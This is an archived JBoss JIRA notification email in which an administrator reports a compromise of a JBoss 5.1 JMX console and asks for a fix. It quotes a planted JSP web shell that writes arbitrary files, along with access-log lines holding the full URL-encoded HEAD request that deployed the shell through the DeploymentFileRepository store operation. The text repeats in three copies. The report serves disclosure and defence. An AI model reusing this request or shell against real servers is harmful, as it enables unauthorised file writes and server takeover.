[jboss-jira] [JBoss JIRA] (JBAS-9535) Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName
Mike Hansen (JIRA)
jira-events at lists.jboss.org
Wed Apr 24 11:58:54 EDT 2013
[ https://issues.jboss.org/browse/JBAS-9535?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Mike Hansen updated JBAS-9535:
------------------------------
Description:
I noticed a new deployment called myname.war with index.jsp which had the following inside:
<%
if(request.getParameter("f")!=null)
(new java.io.FileOutputStream(application.getRealPath("\\") + request.getParameter("f"))).write(request.getParameter("t").getBytes()
);
%>
mynameok
I looked into my web server logs and found the following entry:
ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.)
Here is the complete log of the exploit as recorded by the webserver:
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "-" "-"
access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2"
access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" -
was:
I noticed a new deployment called myname.war with index.jsp which had the following inside:
<%
if(request.getParameter("f")!=null)
(new java.io.FileOutputStream(application.getRealPath("\\") + request.getParameter("f"))).write(request.getParameter("t").getBytes()
);
%>
mynameok
I looked into my web server logs and found the following entry:
ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.)
Here is the complete log of the exploit as recorded by the webserver:
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "-" "-"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 211.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" -
> Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName
> ------------------------------------------------------------------------
>
> Key: JBAS-9535
> URL: https://issues.jboss.org/browse/JBAS-9535
> Project: Application Server 3 4 5 and 6
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: JMX
> Affects Versions: JBossAS-5.1.0.GA
> Environment: CentOS 5.4
> Reporter: Mike Hansen
>
> I noticed a new deployment called myname.war with index.jsp which had the following inside:
> <%
> if(request.getParameter("f")!=null)
> (new java.io.FileOutputStream(application.getRealPath("\\") + request.getParameter("f"))).write(request.getParameter("t").getBytes()
> );
> %>
> mynameok
> I looked into my web server logs and found the following entry:
> ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
> I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.)
> Here is the complete log of the exploit as recorded by the webserver:
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "-" "-"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2"
> access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
> ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
> ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" -
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
More information about the jboss-jira
mailing list